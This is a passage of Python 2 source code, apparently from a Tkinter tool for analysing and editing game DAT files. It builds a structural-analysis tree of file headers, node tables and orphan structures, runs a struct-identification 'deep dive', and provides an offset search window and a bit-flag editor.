		iid = str( Gui.fileStructureTree.selection()[0] )

	# The header item has nothing below it to grow
	if iid == '-32': return

	# First pass: ensure every child attached here also has its siblings present
	for subIid in Gui.fileStructureTree.get_children( iid ):
		subStruct = globalDatFile.structs[ int(subIid.split('/')[-1]) ]
		addSiblingStructures( subStruct, iid )

	# Second pass (now including the newly added siblings): attach each child's own children
	for subIid in Gui.fileStructureTree.get_children( iid ):
		subStruct = globalDatFile.structs[ int(subIid.split('/')[-1]) ]
		addChildStructures( subStruct, subIid )

	adjustSavColumnWidth( iid )
def addParentStructures( structOffset, parentOffset=-1, structDepth=None, initialCall=False ):

	""" Recursively identifies parent structures, and adds them to the treeview, until the target struct can be added.
		This works by working its way up the file structure tree towards the root/ref node tables, and then processing
		those higher-level structures first. This ensures higher confidence in identifying lower branches.

			structOffset: data-section-relative offset of the struct to attach
			parentOffset/structDepth: forwarded to getStruct for struct initialization
			initialCall: True only for the outermost call; skips the envelope-array early-out there """

	# Prevent a ton of redundant tree attachments
	existingEntity = globalDatFile.structs.get( structOffset )
	if isinstance( existingEntity, hsdStructures.EnvelopeObjDesc ):
		return

	# Get the closest upward relative (parent or sibling) to this structure; either from an existing struct, or by scanning the file's pointers.
	if existingEntity and not isinstance( existingEntity, (str, hsdStructures.structBase) ): # Found a known struct, not a hint or generic struct
		parentStructOffsets = Set( existingEntity.getParents(True) ) # Need to make a copy of this set, since we don't want to modify the original
	else:
		parentStructOffsets = Set()
		# No usable struct yet; find parents by scanning every pointer in the file for ones targeting this offset
		for pointerOffset, pointerValue in globalDatFile.pointers:
			if pointerValue == structOffset:
				offset = globalDatFile.getPointerOwner( pointerOffset, offsetOnly=True )
				parentStructOffsets.add( offset )

	# Ensure there's something to add (and it's not recursive)
	if not parentStructOffsets or parentStructOffsets == [structOffset]:
		# Add the Orphan root element in the treeview if it doesn't already exist
		if not Gui.fileStructureTree.exists( 'orphans' ):
			Gui.fileStructureTree.insert( '', 'end', iid='orphans', text='Orphan Structures', values='' )
		print 'Skipped adding branch to struct', uHex(0x20+structOffset), 'because it seems to be an orphan'
		return

	# Remove key structure offsets from the set, to avoid recursively adding this struct to itself,
	# or to the root/ref node tables (those structs will already be added, or it's a label reference)
	parentStructOffsets.difference_update( [structOffset, globalDatFile.headerInfo['rtEnd'], globalDatFile.headerInfo['rootNodesEnd']] )
	if not parentStructOffsets: return

	# Enter a recursive loop to add all parent structs, all the way up to the root or reference nodes tables (this could be a unique branch)
	for offset in parentStructOffsets:
		addParentStructures( offset )

	# At this point on, we are executing for the highest level parent (1st-level/root structs) first, so we can actually initialize the structures now
	structure = globalDatFile.getStruct( structOffset, parentOffset, structDepth )

	if not initialCall:
		if isinstance( structure, hsdStructures.EnvelopeObjDesc ):
			#print 'Found inf. matrix array; canceling AFTER addParentStructures call'
			return

	# Find all instances of this structure's parents in the treeview, and add the new structure to each of them
	for parentIid in getStructureIids( parentStructOffsets ):
		# Check if this parent is a sibling of the current struct, to know whether to open it and add more structs
		thisParentOffset = int( parentIid.split( '/' )[-1] )
		parentIsSibling = structure.isSibling( thisParentOffset )

		# The current structure will have been added by the true parent's 'grow' call, so we can skip siblings
		if not parentIsSibling:
			Gui.fileStructureTree.item( parentIid, open=True )
			growStructuralAnalysisTree( None, parentIid )
def clearStructuralAnalysisTab( restoreBackground=False ):
	""" Empties the Structural Analysis tab (treeview items, properties panel, and
		the struct-search index), optionally restoring the drag-n-drop background. """
	bgImage = Gui.fileStructureTreeBg
	# Show or hide the background drag-n-drop image (hidden by default)
	if restoreBackground:
		bgImage.place( relx=0.5, rely=0.5, anchor='center' )
	else:
		bgImage.place_forget()
	# Remove every item from the structure treeview
	tree = Gui.fileStructureTree
	for iid in tree.get_children():
		tree.delete( iid )
	Gui.structurePropertiesFrame.clear()
	tree.allIids = [] # Reset the index used for searching for structs
def analyzeDatStructure():
	""" Populates the Structural Analysis tab's treeview with the top-level layout of
		the currently loaded DAT file: the file header, relocation table, root and
		reference node tables (plus their descendant structures), the string table,
		and any tail data. Shows an error notice in the properties panel on failure. """
	try:
		tic = time.clock()
		# Reset the column widths and horizontal scrollbar
		structureTreeWidth = Gui.fileStructureTree.winfo_width()
		if structureTreeWidth > 10: # If the Gui hasn't finished rendering, this width should be 1 (so the resize should be avoided)
			offsetColumnWidth = Gui.fileStructureTree.column( 'offset' )['width']
			newMainColumnWidth = structureTreeWidth - offsetColumnWidth - 2
			Gui.fileStructureTree.column( '#0', width=newMainColumnWidth )
		# Get the file name and check that it's one that can be processed
		fileName = globalDatFile.fileName
		if fileName.lower().endswith( 'aj.dat' ): # Unsupported atm; no relocation tables
			print "Animation files are not yet supported. Lmk if you'd like to see them."
			ttk.Label( Gui.structurePropertiesFrame.interior, text='Animation files are not yet supported.', wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12,0) )
			ttk.Label( Gui.structurePropertiesFrame.interior, text="Let me know if you'd like to see them.", wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12,0) )
			return
		hI = globalDatFile.headerInfo
		rootNodesTableStart = hI['rtEnd'] # The root nodes table begins where the relocation table ends
		refNodesTableStart = hI['rootNodesEnd'] # The reference nodes table begins where the root nodes table ends
		stringTableOffset = hI['stringTableStart']
		# Set the filename atop the filetree (truncated if too long to fit)
		if len( fileName ) > 35: fileName = fileName[:32] + '...'
		Gui.fileStructureTree.heading( '#0', anchor='center', text=fileName )
		# Add the file header and relocation table. iid '-32' is -0x20: the header
		# precedes the data section, whose offsets are what the iids are based on
		Gui.fileStructureTree.insert( '', 'end', iid='-32', text='File Header', values='0', open=True )
		rtIid = '-32/' + str( hI['rtStart'] )
		Gui.fileStructureTree.insert( '-32', 'end', iid=rtIid, text='Relocation Table', values=uHex(0x20+hI['rtStart']), open=True )
		Gui.fileStructureTree.allIids = [ '-32', rtIid ] # Tracks every item added; used for searching for structs
		# Add the root node table and its descendants
		if globalDatFile.rootStructNodes:
			nodesTableIid = '-32/' + str( rootNodesTableStart )
			Gui.fileStructureTree.insert( '-32', 'end', iid=nodesTableIid, text='Root Nodes Table', values=uHex(0x20+rootNodesTableStart), open=True )
			Gui.fileStructureTree.allIids.append( nodesTableIid )
			# Add the root node table's descendants
			for node in globalDatFile.rootStructNodes: # Each node is a tuple of (structureOffset, string)
				addTreeFragment( nodesTableIid, structOffset=node[0], parentOffset=rootNodesTableStart, structDepth=(2, 0) )
		# Add the reference node table and its descendants
		if globalDatFile.refStructNodes:
			nodesTableIid = '-32/' + str( refNodesTableStart )
			Gui.fileStructureTree.insert( '-32', 'end', iid=nodesTableIid, text='Reference Nodes Table', values=uHex(0x20+refNodesTableStart), open=True )
			Gui.fileStructureTree.allIids.append( nodesTableIid )
			# Add the reference node table's descendants
			for node in globalDatFile.refStructNodes: # Each node is a tuple of (structureOffset, string)
				addTreeFragment( nodesTableIid, structOffset=node[0], parentOffset=refNodesTableStart, structDepth=(2, 0) )
		# Add the string table
		stringTableIid = '-32/' + str( stringTableOffset )
		Gui.fileStructureTree.insert( '-32', 'end', iid=stringTableIid, text='String Table', values=uHex(0x20+stringTableOffset) )
		Gui.fileStructureTree.allIids.append( stringTableIid )
		# Check for and add tail data (that appearing after the normal end of the file)
		if globalDatFile.tailData:
			addTailData()
		# Display the default panel
		showFileProperties()
		toc = time.clock()
		print 'structural analysis time for', fileName + ':', toc - tic
	except Exception as err:
		# Analysis failed part-way; leave whatever was added and notify the user
		ttk.Label( Gui.structurePropertiesFrame.interior,
			text="The structure of this file could not be determined.",
			wraplength=Gui.structPropFrameWrapLength ).pack( pady=16 )
		print err
		# NOTE(review): this status is set even on failure; presumably intentional
		# (the analysis attempt finished), but confirm it shouldn't report the error
		updateProgramStatus( 'Analysis Complete' )
def addTailData():
	""" Identifies known kinds of tail data (data appearing after the normal end of
		the file) and adds a corresponding entry to the Structural Analysis treeview. """
	dataStart = 0x20 + globalDatFile.headerInfo['stringTableStart'] + globalDatFile.getStringTableSize()
	tailData = globalDatFile.tailData
	# Determine what kind of tail data this is
	itemText = ''
	if len( tailData ) == 0xC and tailData[:4] == bytearray( b'\x53\x52\x47\x42' ): # Looking for the hex "SRGB"
		itemText = 'Sword Swing Colors'
	elif globalDatFile.rootNodes == [ (0, 'MnSelectChrDataTable') ]:
		itemText = '20XX HP Supplemental Data'
	if itemText:
		# NOTE(review): dataStart already includes the 0x20 header size, yet another
		# 0x20 is added for the displayed offset below — confirm this is intended
		itemIid = str( dataStart )
		Gui.fileStructureTree.insert( '', 'end', iid=itemIid, text=itemText, values=uHex(0x20+dataStart) )
		Gui.fileStructureTree.allIids.append( itemIid )
def performDeepDive():
	""" This fully instantiates all structures within the file, looking for orphan structs,
		and counts instances of all identified structures. The resulting per-class counts
		and overall identification rate are displayed in the structure properties panel,
		and any top-level orphans found are added to the structure treeview. """
	# Determine the number of structs in only the data section of the file (remove 1 for header, RT, root/ref nodes, and string table)
	if globalDatFile.headerInfo['rootNodesEnd'] == globalDatFile.headerInfo['stringTableStart']: # Has no reference nodes table
		nonDataSectionStructs = 4
	else: nonDataSectionStructs = 5
	dataSectionStructsCount = len( globalDatFile.structureOffsets ) - nonDataSectionStructs
	# Check if this operation has already been performed on this file (deepDiveStats persists on the file object)
	if not globalDatFile.deepDiveStats:
		# Disable the deep dive button (assumed to be the last child of the last frame in the properties panel)
		buttonsFrame = Gui.structurePropertiesFrame.interior.winfo_children()[-1]
		deepDiveBtn = buttonsFrame.winfo_children()[-1]
		deepDiveBtn['state'] = 'disabled'
		# If this may be slow, show a 'please wait' message to show that something is happening
		if dataSectionStructsCount < 2000:
			plsWaitMessage = ''
		elif dataSectionStructsCount < 5000:
			plsWaitMessage = 'Performing Deep-Dive....'
		else:
			plsWaitMessage = 'Performing Deep-Dive. Please wait; this may take a few moments....'
		if plsWaitMessage:
			plsWaitLabel = ttk.Label( Gui.structurePropertiesFrame.interior, text=plsWaitMessage, wraplength=Gui.structPropFrameWrapLength )
			plsWaitLabel.pack( pady=12 )
			plsWaitLabel.update() # So it will be shown before the process below begins
		# Parse the data section of the file (avoided during initial file loading to save on time)
		print '\nBeginning deep-dive'
		tic = time.clock()
		globalDatFile.parseDataSection()
		toc = time.clock()
		print 'time to fully parse data section', toc - tic, '\n'
		print len(globalDatFile.structureOffsets), 'total file structures identified by primary methods'
		print len(globalDatFile.structs), 'total structs initialized from data section (not counting header, RT, root/ref node tables, string table)'
		# Remove the please wait message, if used
		if plsWaitMessage:
			plsWaitLabel.destroy()
		# Count instances of each kind of structure, keyed by class name
		for structure in globalDatFile.structs.values():
			structClass = structure.__class__.__name__
			if structClass == 'str': structClass = 'structBase' # todo: needs a proper fix; string hints should be resolved to actual structures by now
			if structClass not in globalDatFile.deepDiveStats:
				globalDatFile.deepDiveStats[structClass] = 1
			else:
				globalDatFile.deepDiveStats[structClass] += 1
	# 'structBase' counts structs that got no more specific class identification
	unidentifiedStructs = globalDatFile.deepDiveStats.get( 'structBase', 0 )
	structsIdentified = dataSectionStructsCount - unidentifiedStructs
	# Display the counts for each structure found
	ttk.Label( Gui.structurePropertiesFrame.interior, text='Total Structs Identified: {} of {}'.format(structsIdentified, dataSectionStructsCount) ).pack( pady=(12, 0) )
	ttk.Label( Gui.structurePropertiesFrame.interior, text='Total Identification Rate: {}'.format(format( float(structsIdentified) / dataSectionStructsCount, '.2%' )) ).pack( pady=(0, 12))
	print 'structs identified:', structsIdentified, 'of', dataSectionStructsCount
	print 'total identification rate: ' + str( round(( float(structsIdentified) / dataSectionStructsCount * 100 ), 2) ) + '%'
	# Build a 3-column table of class name / count / percentage
	classCountFrame = ttk.Frame( Gui.structurePropertiesFrame.interior )
	row = 0
	padx = 5
	for className, classCount in sorted( globalDatFile.deepDiveStats.items() ):
		if className == 'structBase': continue # Skip it, so we can be sure to add it last
		ttk.Label( classCountFrame, text=className + ':' ).grid( column=0, row=row, padx=padx )
		ttk.Label( classCountFrame, text=classCount ).grid( column=1, row=row, padx=padx )
		ttk.Label( classCountFrame, text=format( float(classCount) / dataSectionStructsCount, '.3%' ) ).grid( column=2, row=row, padx=padx )
		row += 1
	# Add the unidentified ('structBase') row last
	ttk.Label( classCountFrame, text='Unidentified Structs:' ).grid( column=0, row=row, padx=padx )
	ttk.Label( classCountFrame, text=unidentifiedStructs ).grid( column=1, row=row, padx=padx )
	ttk.Label( classCountFrame, text=format( float(unidentifiedStructs) / dataSectionStructsCount, '.3%' ) ).grid( column=2, row=row, padx=padx )
	classCountFrame.pack()
	# Determine existence of orphan structures
	if not globalDatFile.orphanStructures:
		ttk.Label( Gui.structurePropertiesFrame.interior, text='All Structures Initialized' ).pack( pady=(12, 0) )
	elif len( globalDatFile.structs ) == dataSectionStructsCount:
		orphansText = '{} structures identified but not initialized. May be orphans or children of orphans.'.format( len(globalDatFile.orphanStructures) )
		ttk.Label( Gui.structurePropertiesFrame.interior, text=orphansText, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12, 0) )
		# Filter for "true" orphans: structs with no parents, or only themselves as parent
		orphansToAdd = []
		for orphanStructOffset in globalDatFile.orphanStructures:
			# Initialize or get a structure object
			orphanStruct = globalDatFile.getStruct( orphanStructOffset )
			if not orphanStruct: continue
			# Check if it's really on its own (may have parents, just not grandparents or great grandparents, etc)
			orphanParents = orphanStruct.getParents( includeNodeTables=True )
			#print 'orphan', orphanStruct.name ,'parent(s):', [hex(o+0x20) for o in orphanParents]
			if len( orphanParents ) == 0:
				#print 'orphan struct has 0 parents;', orphanStruct.name
				pass
			elif len( orphanParents ) == 1 and orphanStruct.offset in orphanParents:
				# orphanIid = 'orphans/' + str( orphanStruct.offset )
				# addTreeFragment( 'orphans', structure=orphanStruct )
				#print 'orphan struct has 1 parents: itself;', orphanStruct.name
				pass
			else: # Not a true orphan itself
				#print 'non-true orphan:', orphanStruct.name
				continue
			orphansToAdd.append( orphanStruct )
		if orphansToAdd:
			orphansText2 = 'Found {} top-level orphans (displayed in structure tree).'.format( len(orphansToAdd) )
			ttk.Label( Gui.structurePropertiesFrame.interior, text=orphansText2, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12, 0) )
			# Add the Orphan root element in the treeview if it doesn't already exist
			if not Gui.fileStructureTree.exists( 'orphans' ):
				Gui.fileStructureTree.insert( '', 'end', iid='orphans', text='Orphan Structures', values='', open=False )
			for orphanStruct in orphansToAdd:
				#orphanIid = 'orphans/' + str( orphanStruct.offset )
				addTreeFragment( 'orphans', structure=orphanStruct )
		else:
			ttk.Label( Gui.structurePropertiesFrame.interior, text='No top-level orphans found.' ).pack( pady=(12, 0) )
	else:
		# Some data-section structs could not be initialized at all
		failedInitNotice = '{} data section structs could not be initialized.'.format( dataSectionStructsCount - len( globalDatFile.structs ) )
		ttk.Label( Gui.structurePropertiesFrame.interior, text=failedInitNotice, wraplength=Gui.structPropFrameWrapLength ).pack( pady=(12, 0) )
class structSearchWindow( basicWindow ):

	""" A small tool window for finding a structure in the Structural Analysis tab by
		file offset. The offset may point to the start of a structure or anywhere
		within one; multiple comma-separated offsets may also be entered. """

	def __init__( self ):
		basicWindow.__init__( self, Gui.root, 'Structure Search', dimensions=(280, 200) )
		ttk.Label( self.mainFrame, text="Enter an offset and press Enter to search for a structure "
			"at that offset, or for the structure that contains it.", wraplength=260 ).pack( pady=4 )
		self.offsetEntry = ttk.Entry( self.mainFrame, width=8, justify='center' )
		self.offsetEntry.pack( padx=5, pady=2 )
		self.offsetEntry.bind( '<Return>', self.searchForStruct )
		self.offsetEntry.focus()
		# Set up a space for results
		self.resultsFrame = ttk.Frame( self.mainFrame )
		self.resultsFrame.pack()

	def searchForStruct( self, event ):
		""" Bound to the Enter key on the offset entry. Validates the entered offset(s),
			reports which region of the file each falls in, and for valid data-section
			offsets adds/selects the containing structure in the Structural Analysis tab. """
		if not globalDatFile:
			msg( 'No DAT file has been loaded.' )
			return
		# Remove current information/results displayed for the structure
		for child in self.resultsFrame.winfo_children(): child.destroy()
		enteredString = self.offsetEntry.get()
		# Get the entered value and validate it
		if not enteredString or not ',' in enteredString:
			# Looking for one value (an empty string fails int() and is caught below)
			try:
				targetOffsets = [ int(enteredString, 16) - 0x20 ] # Subtracting 0x20 to make this relative to the data section.
				if targetOffsets[0] < -0x20: raise ValueError() # C'mon, man
			except:
				msg( 'Invalid offset given. Please enter a positive hex value.' )
				return
		else: # User likely wants to find multiple structures
			try:
				targetOffsets = [ int(subString, 16) - 0x20 for subString in enteredString.split(',') ]
				for offset in targetOffsets:
					if offset < -0x20: raise ValueError() # C'mon, man
			except:
				msg( 'Invalid offset given. Please enter positive hex values.' )
				return
		# Define a few things to prepare for validation
		rtEnd = globalDatFile.headerInfo['rtEnd']
		filesize = globalDatFile.headerInfo['filesize']
		dataSectionEnd = globalDatFile.headerInfo['rtStart'] # The relocation table starts where the data section ends
		stringTableStart = globalDatFile.headerInfo['stringTableStart']
		# Validate the input; report (and bail) if any offset falls outside the data section
		for offset in targetOffsets:
			if len( targetOffsets ) == 1: messageStart = 'This offset'
			else: messageStart = 'The offset ' + uHex( 0x20 + offset ) # Multiple given; need to be specific
			errorMessage = ''
			if offset < 0: # This is within the file header
				Gui.fileStructureTree.see( '' )
				errorMessage = '{} is within the file header.'.format( messageStart )
			elif offset >= dataSectionEnd:
				if offset < rtEnd:
					errorMessage = '{} is within the Relocation Table, which extends from {:X} to {:X}.'.format( messageStart, 0x20+dataSectionEnd, 0x20+rtEnd )
				elif offset < stringTableStart:
					errorMessage = '{} is within the Root/Reference Node Tables, which extend from {:X} to {:X}.'.format( messageStart, 0x20+rtEnd, 0x20+stringTableStart )
				elif offset + 0x20 < filesize:
					errorMessage = '{} is within the String Table, which extends from {:X} to {:X}.'.format( messageStart, 0x20+stringTableStart, filesize )
				else:
					errorMessage = '{0} is beyond the bounds of the file, which is 0x{1:X} long ({1:,} bytes).'.format( messageStart, filesize )
			if errorMessage:
				ttk.Label( self.resultsFrame, text=errorMessage, wraplength=260 ).pack()
				return
		targetOffset = targetOffsets[0] #todo: finish adding support for searching for multiple structures
		# Get the offset of the start of the structure that contains the given offset
		if targetOffset in globalDatFile.structureOffsets: # ez; This is already the start of a struct
			structStartOffset = targetOffset
			prelimLocationText = '0x{0:X} is the starting offset of a structure.'.format( 0x20+structStartOffset )
		else:
			# Figure out what structure this offset belongs to
			structStartOffset = globalDatFile.getPointerOwner( targetOffset, offsetOnly=True )
			prelimLocationText = '0x{0:X} is within Struct 0x{1:X}.'.format( 0x20+targetOffset, 0x20+structStartOffset )
		# Display results in the search window.
		ttk.Label( self.resultsFrame, text=prelimLocationText, wraplength=260 ).pack()
		# Add the structure and any parents required for it to the treeview
		operationResultsText = showStructInStructuralAnalysis( structStartOffset )
		ttk.Label( self.resultsFrame, text=operationResultsText, wraplength=260 ).pack( pady=4 )
		# Switch to the SA tab, just in case we're not there
		Gui.mainTabFrame.select( Gui.savTab )
class FlagDecoder( basicWindow ):

	""" Used to view and modify DAT file structure flags, and the individual bits associated to them. """

	existingWindows = {} # todo; bring to focus existing windows rather than creating new ones

	def __init__( self, structure, fieldOffsets, fieldAndValueIndex ):
		""" structure: the struct object containing the flags field.
			fieldOffsets: offset(s) of the field to edit (may be a list for multi-edit).
			fieldAndValueIndex: index of the flags field within the structure's fields/values. """
		# Store the given arguments
		self.structure = structure
		self.fieldOffsets = fieldOffsets # Relative to data section, not struct start (may be a list, if multiple locations should be edited)
		self.fieldAndValueIndex = fieldAndValueIndex
		# Collect info on these flags
		fieldName = structure.fields[fieldAndValueIndex]
		structFlagsDict = getattr( structure, 'flags', {} ) # Returns an empty dict if one is not found.
		self.individualFlagNames = structFlagsDict.get( fieldName ) # Will be 'None' if these flags aren't defined in the structure's class
		self.flagFieldLength = struct.calcsize( structure.formatting[fieldAndValueIndex+1] ) # Byte length of the flags field
		# Create a string for iterating bits
		self.allFlagsValue = structure.getValues()[fieldAndValueIndex] # Single value representing all of the flags
		self.bitString = format( self.allFlagsValue, 'b' ).zfill( self.flagFieldLength * 8 ) # Adds padding to the left to fill out to n*8 bits
		# Determine the window spawn position (if this will be a long list, spawn the window right at the top of the main GUI)
		if self.individualFlagNames and len( self.individualFlagNames ) > 16: spawnHeight = 0
		elif not self.individualFlagNames and len( self.bitString ) > 16: spawnHeight = 0
		else: spawnHeight = 180
		# Determine the window name
		if isinstance( fieldOffsets, list ):
			shortName = structure.name.split( '0x' )[0].rstrip()
			if len( fieldOffsets ) > 3: # Too many to list individually in the title
				offsetsString = '({} total)'.format( len(fieldOffsets) )
			else:
				relStructOffset = structure.valueIndexToOffset( fieldAndValueIndex ) - structure.offset
				offsetsString = '/'.join( [uHex(o+0x20-relStructOffset) for o in fieldOffsets] )
			windowName = 'Flag Decoder - {} {}, {}'.format( shortName, offsetsString, fieldName.replace( '_', ' ' ) )
		else:
			windowName = 'Flag Decoder - {}, {}'.format( structure.name, fieldName.replace( '_', ' ' ) )
		# Generate the basic window
		basicWindow.__init__( self, Gui.root, windowName, offsets=(180, spawnHeight) )
		# Define some fonts to use
		self.fontNormal = tkFont.Font( size=11 )
		self.boldFontLarge = tkFont.Font( weight='bold', size=14 )
		self.boldFontNormal = tkFont.Font( weight='bold', size=12 )
		self.drawWindowContents()

	def drawWindowContents( self ):
		""" Builds the window's widgets: a hex/binary breakdown of the combined flags
			value up top, and a table of one row per flag (or per bit) below it. """
		# Display a break-down of all of the actual bits from the flag value
		self.bitsGrid = ttk.Frame( self.mainFrame )
		byteStringsList = [ self.bitString[i:i+8] for i in xrange(0, len(self.bitString), 8) ] # A list, where each entry is a string of 8 bits
		for i, byteString in enumerate( byteStringsList ): # Add the current byte as both hex and binary
			ttk.Label( self.bitsGrid, text='{0:02X}'.format(int( byteString, 2 )), font=self.boldFontLarge ).grid( column=i, row=0, ipadx=4 )
			ttk.Label( self.bitsGrid, text=byteString, font=self.boldFontLarge ).grid( column=i, row=1, ipadx=4 )
		ttk.Label( self.bitsGrid, text=' ^ bit {}'.format(len(self.bitString) - 1), font=self.fontNormal ).grid( column=0, row=2, sticky='w', ipadx=4 )
		ttk.Label( self.bitsGrid, text='bit 0 ^ ', font=self.fontNormal ).grid( column=len(byteStringsList)-1, row=2, sticky='e', ipadx=4 )
		self.bitsGrid.pack( pady=(10, 0), padx=10 )
		# Iterate over the bits or flag enumerations and show the status of each one
		self.flagTable = ttk.Frame( self.mainFrame )
		row = 0
		if self.individualFlagNames: # This will be a definition (ordered dictionary) from the structure's class.
			for bitMapString, bitName in self.individualFlagNames.items():
				# bitMapString is of the form 'base<<shift'; parse it into an int mask
				baseValue, shiftAmount = bitMapString.split( '<<' )
				shiftAmount = int( shiftAmount )
				# Mask out the bits unrelated to this property
				bitMask = int( baseValue ) << shiftAmount
				ttk.Label( self.flagTable, text=bitMapString, font=self.fontNormal ).grid( column=0, row=row )
				# Set up the checkbox variable, and add the flag name to the GUI (bold when set)
				var = Tk.IntVar()
				if self.flagsAreSet( bitMask, shiftAmount ):
					var.set( 1 )
					ttk.Label( self.flagTable, text=bitName, font=self.boldFontNormal ).grid( column=1, row=row, padx=14 )
				else:
					var.set( 0 )
					ttk.Label( self.flagTable, text=bitName, font=self.fontNormal ).grid( column=1, row=row, padx=14 )
				# Attach the flag's metadata directly to the checkbutton for the click handler
				chkBtn = ttk.Checkbutton( self.flagTable, variable=var )
				chkBtn.var = var
				chkBtn.row = row
				chkBtn.bitMask = bitMask
				chkBtn.shiftAmount = shiftAmount
				chkBtn.grid( column=2, row=row )
				chkBtn.bind( '<1>', self.toggleBits ) # Using this instead of the checkbtn's 'command' argument so we get an event (and widget reference) passed
				row += 1
		else: # Undefined bits/properties; just show one row per bit
			for i, bit in enumerate( reversed(self.bitString) ):
				# Add the bit number and it's value
				ttk.Label( self.flagTable, text='Bit {}:'.format(i), font=self.fontNormal ).grid( column=0, row=row )
				# Add the flag(s) name and value
				var = Tk.IntVar()
				if bit == '1':
					var.set( 1 )
					ttk.Label( self.flagTable, text='Set', font=self.boldFontNormal ).grid( column=1, row=row, padx=6 )
				else:
					var.set( 0 )
					ttk.Label( self.flagTable, text='Not Set', font=self.fontNormal ).grid( column=1, row=row, padx=6 )
				chkBtn = ttk.Checkbutton( self.flagTable, variable=var )
				chkBtn.var = var
				chkBtn.row = row
				chkBtn.bitMask = 1 << i
				chkBtn.shiftAmount = i
				chkBtn.grid( column=2, row=row )
				chkBtn.bind( '<1>', self.toggleBits ) # Using this instead of the checkbtn's 'command' argument so we get an event (and widget reference) passed
				row += 1
		self.flagTable.pack( pady=10, padx=10 )

	def flagsAreSet( self, bitMask, bitNumber ):
		""" Can check a mask of one or multiple bits (i.e. 0x1000 or 0x1100 ), except
			when checking for a bitMask of 0, which only checks one specific bit. """
		if bitMask == 0: # In this case, this flag will be considered 'True' or 'On' if the bit is 0
			return not ( 1 << bitNumber ) & self.allFlagsValue
		else:
			return ( bitMask & self.allFlagsValue ) == bitMask

	def toggleBits( self, event ):
		""" Click handler for the flag checkbuttons. Sets or clears every bit in the
			clicked flag's mask, then refreshes the window and saves to the file. """
		# Get the widget's current value and invert it (since this method is called before the widget can update its value on its own)
		flagIsToBeSet = not event.widget.var.get()
		# For flags whose 'True' or 'On' case is met when the bit value is 0, invert whether the flags should be set to 1 or 0
		bitMask = event.widget.bitMask
		if bitMask == 0:
			flagIsToBeSet = not flagIsToBeSet
			bitMask = 1 << event.widget.shiftAmount
		# Set or unset all of the bits for this flag
		if flagIsToBeSet:
			self.allFlagsValue = self.allFlagsValue | bitMask # Sets all of the masked bits in the final value to 1
		else:
			self.allFlagsValue = self.allFlagsValue & ~bitMask # Sets all of the masked bits in the final value to 0 (~ operation inverts bits)
		# Rebuild the bit string and update the window contents
		self.updateBitBreakdown()
		self.updateFlagRows()
		# Change the flag value in the file
		self.updateFlagsInFile()
		return 'break' # Prevents propagation of this event (the checkbutton's own event handler won't even fire)

	def updateBitBreakdown( self ):
		""" Updates the flag strings of hex and binary, and then redraws them in the GUI. """
		# Update the internal strings
		self.bitString = format( self.allFlagsValue, 'b' ).zfill( self.flagFieldLength * 8 ) # Adds padding to the left to fill out to n*8 bits
		byteStringsList = [ self.bitString[i:i+8] for i in xrange(0, len(self.bitString), 8) ] # A list, where each entry is a string of 8 bits
		# Update the GUI
		for i, byteString in enumerate( byteStringsList ):
			# Update the hex display for this byte
			hexDisplayLabel = self.bitsGrid.grid_slaves( column=i, row=0 )[0]
			hexDisplayLabel['text'] = '{0:02X}'.format(int( byteString, 2 ))
			# Update the binary display for this byte
			binaryDisplayLabel = self.bitsGrid.grid_slaves( column=i, row=1 )[0]
			binaryDisplayLabel['text'] = byteString

	def updateFlagRows( self ):
		""" Checks all flags/rows to see if the flag needs to be updated. All of
			them need to be checked because some flags can affect other flag rows. """
		for checkboxWidget in self.flagTable.grid_slaves( column=2 ):
			flagNameLabel = self.flagTable.grid_slaves( column=1, row=checkboxWidget.row )[0]
			# Set the boldness of the font, and the state of the checkbox
			if self.flagsAreSet( checkboxWidget.bitMask, checkboxWidget.shiftAmount ):
				flagNameLabel['font'] = self.boldFontNormal
				checkboxWidget.var.set( 1 )
			else:
				flagNameLabel['font'] = self.fontNormal
				checkboxWidget.var.set( 0 )

	def updateFlagsInFile( self ):
		""" Updates the combined value of the currently set flags in the file's data and in entry fields in the main program window.
			This [unfortunately] needs to rely on a search methodology to target entry field widgets that need updating,
			because they can be destroyed and re-created (thus, early references to existing widgets can't be trusted). """
		# Convert the value to a hex string of the field's full byte length
		newHex = '{0:0{1}X}'.format( self.allFlagsValue, self.flagFieldLength*2 ) # Formats as hex; pads up to n zeroes (second arg)
		# Update the field entry widgets in the Structural Analysis tab, if it's currently showing this set of flags
		structTable = getattr( Gui.structurePropertiesFrame, 'structTable', None )
		if structTable:
			# Get the offset of the structure shown in the panel (offset of the first field entry), to see if it's the same as the one we're editing
			firstFieldOffsets = structTable.grid_slaves( column=1, row=0 )[0].offsets # Should never be a list when generated here
			if firstFieldOffsets == self.structure.offset:
				# Set the value of the entry widget, and trigger its bound update function (which will handle everything from validation through data-saving)
				hexEntryWidget = structTable.grid_slaves( column=1, row=self.fieldAndValueIndex )[0]
				self.updateWidget( hexEntryWidget, newHex )
		# Update the field entry widgets in the Texture Tree's Properties tab, if it's currently showing this set of flags
		flagWidgets = Gui.texturePropertiesPane.flagWidgets
		# Map the struct's length to the flags field's offset within it
		if self.structure.length == 0xC: # Pixel Proc. struct
			structOffset = 0
		elif self.structure.length == 0x18: # Material struct
			structOffset = 4
		elif self.structure.length == 0x5C: # Texture struct
			structOffset = 0x40
		else: # Allow this method to fail silently
			print 'Unexpected structure length for the Flag Decoder update method:', hex( self.structure.length )
			structOffset = 0
		for widget in flagWidgets:
			# Attempt to match this widget's flag offsets to the start of this window's structure offset
			if self.structure.offset in ( offset - structOffset for offset in widget.offsets ): # Generator of potential structure start offsets
				# Avoid updating this widget if this window is from the SA tab and there's more than one set of flags being represented by the target widget
				if not isinstance( self.fieldOffsets, list ) and len( widget.offsets ) > 1:
					# Do however update the widget to show that some of the structs it refers to have different values than others
					widget['highlightbackground'] = 'orange'
					widget['highlightthickness'] = 2
				else:
					self.updateWidget( widget, newHex )
				break
		# Update the actual data in the file for each offset
		updateName = self.structure.fields[self.fieldAndValueIndex].replace( '_', ' ' ).replace( '\n', ' ' )
		# Update the value in the file containing the modified flag(s)
		descriptionOfChange = updateName + ' modified in ' + globalDatFile.fileName
		newData = bytearray.fromhex( newHex )
		if type( self.fieldOffsets ) == list: # This is expected to be for an entry on the Texture Tree tab's Properties tab
			for offset in self.fieldOffsets:
				globalDatFile.updateData( offset, newData, descriptionOfChange )
		else: # This is expected to be for an entry on the Structural Analysis tab
			globalDatFile.updateData( self.fieldOffsets, newData, descriptionOfChange )
		updateProgramStatus( updateName + ' Updated' )

